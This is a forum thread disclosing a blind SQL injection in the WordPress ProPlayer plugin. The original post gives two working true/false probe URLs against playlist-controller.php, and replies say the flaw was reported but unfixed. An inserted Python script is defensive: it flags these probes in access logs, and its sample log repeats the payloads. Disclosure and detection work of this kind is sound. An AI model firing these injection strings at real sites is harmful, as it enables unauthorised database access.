WP-ProPlayer Plugin Blind SQL Injection
ca0s « on: December 11, 2010, 11:09:09 pm »
<-------
WP-ProPlayer Blind SQL Injection
Founder: Ca0s
Visit: st4ck-3rr0r.blogspot.com, ka0-labs.org
Shouts @ evilzone.org, elhacker.net, diosdelared.com
------->
<-------
Software: ProPlayer <= 4.7.7
URL:
http://wordpress.org/extend/plugins/proplayer/
http://isagoksu.com/proplayer-wordpress-plugin/
Vuln: Blind SQL Injection ->
/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='a
/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=[ID]')+and+('a'='b
Note: some servers filter ' to %27, so it won't work this way.
------->
ca0s @
ka0labs
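The two requests in the post above differ only in the trailing boolean comparison, so they can be flagged in web-server access logs by checking whether `pp_playlist_id` is anything other than a plain integer. This is an added example, not part of the original post or the plugin's code; the log lines are constructed, and the rule that a legitimate playlist ID is numeric is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/wp-content/plugins/proplayer/playlist-controller.php"
PARAM = "pp_playlist_id"
# Client address and request target from a combined-format access log entry.
REQUEST_RE = re.compile(r'(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
NUMERIC_ID = re.compile(r"[0-9]+")  # assumption: legitimate IDs are plain integers

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Dec/2010:00:01:02 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=7 HTTP/1.1" 200 512
198.51.100.4 - - [12/Dec/2010:00:01:05 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=7')+and+('a'='a HTTP/1.1" 200 512
198.51.100.4 - - [12/Dec/2010:00:01:06 +0000] "GET /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=7%27)+and+(%27a%27=%27b HTTP/1.1" 200 0
203.0.113.9 - - [12/Dec/2010:00:02:00 +0000] "GET /index.php?pp_playlist_id=x HTTP/1.1" 200 99
"""


def suspicious_requests(log_text):
    """Return (client_ip, decoded_value) for each non-numeric playlist ID sent to the endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # endswith() also covers WordPress installed in a subdirectory.
        if not url.path.endswith(ENDPOINT):
            continue
        # parse_qs percent-decodes, so a literal ' and %27 compare as the same character.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric {PARAM}: {value!r}")
```

Two flagged requests from one client whose values differ only in the final comparison, especially with different response sizes, match the true/false probe pair shown in the post.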
ande « Reply #1 on: December 12, 2010, 12:06:11 am »
Vulnerability status? I couldn't find any fix notes on their site.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true
ca0s « Reply #2 on: December 12, 2010, 12:58:06 am »
Unfixed.
I reported it to the author.
ande « Reply #3 on: December 12, 2010, 01:04:08 am »
Quote from: ca0s on December 12, 2010, 12:58:06 am
Unfixed.
I reported it to the author.
Sweet, better hope they fix it quick
solar « Reply #4 on: February 25, 2011, 07:24:13 pm »
Cool... nice find.